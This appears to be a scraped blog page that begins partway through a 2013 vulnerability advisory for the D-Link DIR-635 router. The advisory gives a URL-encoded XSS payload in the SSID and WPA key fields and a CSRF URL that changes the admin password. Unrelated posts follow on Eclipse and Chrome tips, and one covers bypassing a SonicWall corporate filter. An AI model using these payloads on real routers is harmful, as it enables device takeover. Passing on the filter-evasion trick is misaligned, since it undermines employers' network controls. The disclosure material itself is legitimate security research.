config.wireless%5B0%5D.radio_control=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wlan_schedule_name=Alw
ays&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ssid=%22%3E%3Cimg+src%3D%220%22+onerror%3Dalert%282
%29%3E&config.wireless%5B0%5D.erp_protection=true&config.wireless%5B0%5D.phy_mode=11&config.wireless%5B0
%5D.auto_channel=true&config.wireless%5B0%5D.channel=6&config.wireless%5B0%5D.tx_rate=0&config.wireless%5B
0%5D.cwm_mode=0&config.wireless%5B0%5D.num_streams=65535&config.wireless%5B0%5D.ssid_profiles%5B0%5D.i
nvisibility=0&wireless_invisibility_radio_0=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.qos=0&config.wireless
%5B0%5D.ssid_profiles%5B0%5D.wepon=false&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ieee8021x_enabled=fa
lse&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_enabled=true&config.wireless%5B0%5D.ssid_profiles%5B0
%5D.keylen=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key_type=0&config.wireless%5B0%5D.ssid_profi
les%5B0%5D.wep_key%5B0%5D=1234567890255123456789
0255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B1%5D=12345678902551234567890255&config.wirele
ss%5B0%5D.ssid_profiles%5B0%5D.wep_key%5B2%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_
profiles%5B0%5D.wep_key%5B3%5D=12345678902551234567890255&config.wireless%5B0%5D.ssid_profiles%5B0%5D.
use_key=0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.auth=1&config.wireless%5B0%5D.ssid_profiles%5B0%5D.
wpa_mode=2&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_cipher=3&config.wireless%5B0%5D.ssid_profiles
%5B0%5D.wpa_rekey_time=3600&config.wireless%5B0%5D.ssid_profiles%5B0%5D.wpa_psk=%22%3E%3Cimg+src%3D
%220%22+onerror%3Dalert%281%29%3E&config.wireless%5B0%5D.ssid_profiles%5B0%5D.ieee8021x_reauth_time=60&
config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_server_address=0.0.0.0&config.wireless%5B0%5D.ssid_profiles
%5B0%5D.radius_server_port=1812&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius_shared_secret=radius_sha
red&config.wireless%5B0%5D.ssid_profiles%5B0%5D.radius
_auth_mac=true&config.wireless%5B0%5D.ssid_profiles%5B0%5D.
second_radius_server_address=0.0.0.0&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_server_port=1
812&config.wireless%5B0%5D.ssid_profiles%5B0%5D.second_radius_shared_secret=radius_shared&config.wireless%5
B0%5D.ssid_profiles%5B0%5D.second_radius_auth_mac=true
The code gets executed via Status -> Device Information:
http://Target-IP/Status/Device_Info.shtml
* reflected XSS via Extras -> system Check -> Ping
Injecting scripts into the parameter data reveals that this parameter is not properly validated for malicious input.
* For changing the current password there is no request to the current password
With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.
* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management:
http://Target-IP/Tools/Admin.shtml?config.password=admin1&config.user_password=&config.gw_name=D-
Link+Systems+DIR-
635&config.web_server_idle_timeout=5&config.graph_auth=false&config.web_server_allow_https=false&config.web_se
rver_allow_wan_http=false&config.web_server_allow_wan_https=false&config.web_server_wan_port_http=8080&confi
g.web_server_wan_port_https=8181&config.wan_web_ingress_filter_name=Allow+All&wan_ingress_filter_details=Allo
w+All
============ Solution ============
No known solution available.
============ Credits ============
The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-013
Twitter: @s3cur1ty_de
============ Time Line: ============
November 2012 - discovered vulnerability
11.11.2012 - contacted dlink via the webinterface http://www.dlink.com/us/en/support/contact-support
20.12.2012 - contacted Heise Security with details and Heisec forwarded the details to D-Link
21.12.2012 - D-link responded that they will check the findings
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D-Link responded that this is a security problem from the user and/or browser and they will not provide a fix
25.04.2013 - public release
Replace Eclipse Splash Screen
At work, we are currently using a modified version of the Eclipse IDE, so whenever I open Eclipse I see the company's logo. If you're the type of person who likes to personalize stuff (like me☺) you can change the Eclipse IDE's default splash screen following the directions below:
1. (This step may be necessary in some distros, specially for modified versions of Eclipse, but not really that important if the file used is still the default) Navigate to the Eclipse configuration file normally located in the path below:
{eclipseBaseDirectory}\configuration\config.ini
2. Check the location of the splash image as defined in the configuration file (should look like the one below):
osgi.splashPath=platform\:/base/plugins/org.eclipse.platform
Note: The path above is the default path of the splash image, hence if the version of Eclipse that you are using is not modified, chances are the splash image should be here.
3. Navigate to the path defined in the configuration file and replace the file named "splash.bmp"
4. Restart Eclipse and voila!
1. (This step may be necessary in some distros, specially for modified versions of Eclipse, but not really that important if the file used is still the default) Navigate to the Eclipse configuration file normally located in the path below:
{eclipseBaseDirectory}\configuration\config.ini
2. Check the location of the splash image as defined in the configuration file (should look like the one below):
osgi.splashPath=platform\:/base/plugins/org.eclipse.platform
Note: The path above is the default path of the splash image, hence if the version of Eclipse that you are using is not modified, chances are the splash image should be here.
3. Navigate to the path defined in the configuration file and replace the file named "splash.bmp"
4. Restart Eclipse and voila!
Saturday, April 27, 2013
Friday, April 26, 2013
Saving and Restoring your session's Tabs in Chrome
I'm the kind of person that tends to keep huge numbers of tabs open either for future reading or just 'cause I know I'll be using them later on. With Firefox, this is a mess, 'cause if one of the tabs stop responding you'll have to kill the entire session and relaunch the entire browser. With Chrome and IE though, the system treats each tab as a separate instance of the application. Hence, when one of the tabs become unstable, you can just kill that specific instance and keep the rest alive.
Problem is if it is the PC itself that becomes unresponsive. Well Chrome has something that can deal with this (sort off...).
Problem is if it is the PC itself that becomes unresponsive. Well Chrome has something that can deal with this (sort off...).
Tab Saver is Chrome add on I recently added to my Chrome portable. Available for download here. It saves your tab list on your disk so you can open it later. The add on, by the way, detects the open tabs per window. So if you have tab groups open on multiple Chrome windows, you can save them separately then open them later on for viewing.
Thursday, April 25, 2013
Saturday, April 20, 2013
Bypass SonicWall Internet firewall without using Proxy
Say you want to browse a website but your IT has set a restriction on viewing some websites within your corporate network. You can always use a proxy but this would undermine the security of your browsing (as what proxy servers do is become a "middle-man" for the internet traffic when you use them, sending the data you send to website on your behalf and serving the data returned to you by the website in return). One such example, Sonicwall (and some other web access restriction firewalls) can be easily tricked (if not setup porperly by your IT) by browsing the "secure" version of the website.
Example:
http://www.facebook.com
Example:
http://www.facebook.com
Change the URL to:
https://www.facebook.com
Subscribe to:
Posts (Atom)